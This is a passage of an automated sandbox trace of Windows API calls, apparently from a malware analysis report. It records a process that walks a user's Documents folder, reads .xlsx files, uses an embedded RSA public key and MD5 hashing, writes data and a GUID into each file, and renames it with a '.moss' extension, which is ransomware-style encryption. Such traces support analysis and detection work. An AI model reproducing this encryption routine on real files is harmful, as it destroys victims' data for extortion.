returned 1 [0169.663] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.667] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xdc63, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.667] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.668] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.668] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xdc89, lpOverlapped=0x0) returned 1 [0169.669] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.669] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.669] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.669] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.669] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.670] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.670] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.670] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.670] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.670] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.670] GetLastError () returned 0x0 [0169.670] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.670] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.670] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.670] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.671] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.671] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.671] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xdc90) returned 0x3b62d40 [0169.671] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.671] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b447b0 [0169.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0169.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b458f0 [0169.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbf60 [0169.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45938 [0169.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbf78 [0169.671] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbfa8 [0169.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbfc0 [0169.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0169.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0169.672] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0169.672] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbfa8 | out: hHeap=0xcd0000) returned 1 [0169.672] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbfc0 | out: hHeap=0xcd0000) returned 1 [0169.672] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.672] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.672] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2a0 [0169.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbfc0 [0169.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0169.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fbfa8 [0169.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0169.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0169.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0169.672] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.672] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.672] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbfc0 | out: hHeap=0xcd0000) returned 1 [0169.672] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.672] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbfa8 | out: hHeap=0xcd0000) returned 1 [0169.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0169.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0169.673] GetCurrentThreadId () returned 0x324 [0169.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0xd32990 [0169.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35ceae8 [0169.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35deb08 [0169.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.673] GetCurrentThreadId () returned 0x324 [0169.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0169.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0169.673] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.673] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362c768 [0169.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0169.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0169.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0169.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0169.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbfa8 [0169.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0169.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0169.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0169.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0169.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbfc0 [0169.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0169.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0169.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0169.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbf90 [0169.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0169.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbb70 [0169.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.674] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0169.674] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0169.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbfd8 [0169.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc90 [0169.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0169.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0169.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0169.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0169.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbfa8 | out: hHeap=0xcd0000) returned 1 [0169.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbfa8 [0169.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b449a8 [0169.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0169.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b44bb8 [0169.675] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.676] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xdc89, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.676] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.676] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.676] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.676] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.676] CloseHandle (hObject=0x664) returned 1 [0169.678] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bUI6gz9k xvqeKo.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bui6gz9k xvqeko.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bUI6gz9k xvqeKo.xlsx.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bui6gz9k xvqeko.xlsx.moss")) returned 1 [0169.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.679] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.679] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.680] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0169.680] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0169.681] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned=".ini" [0169.681] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0169.681] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x976494a0, ftCreationTime.dwHighDateTime=0x1d5dbc1, ftLastAccessTime.dwLowDateTime=0xef585fc0, ftLastAccessTime.dwHighDateTime=0x1d5a903, ftLastWriteTime.dwLowDateTime=0xef585fc0, ftLastWriteTime.dwHighDateTime=0x1d5a903, nFileSizeHigh=0x0, nFileSizeLow=0x179b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FORbsqeG8F-z_NR.xlsx", cAlternateFileName="FORBSQ~1.XLS")) returned 1 [0169.681] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FORbsqeG8F-z_NR.xlsx") returned=".xlsx" [0169.681] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FORbsqeG8F-z_NR.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\forbsqeg8f-z_nr.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.681] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=96692) returned 1 [0169.681] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.684] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x1798e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.684] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.685] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x179b4, lpOverlapped=0x0) returned 1 [0169.686] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.686] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.686] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.686] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.687] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.687] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.687] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.687] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, 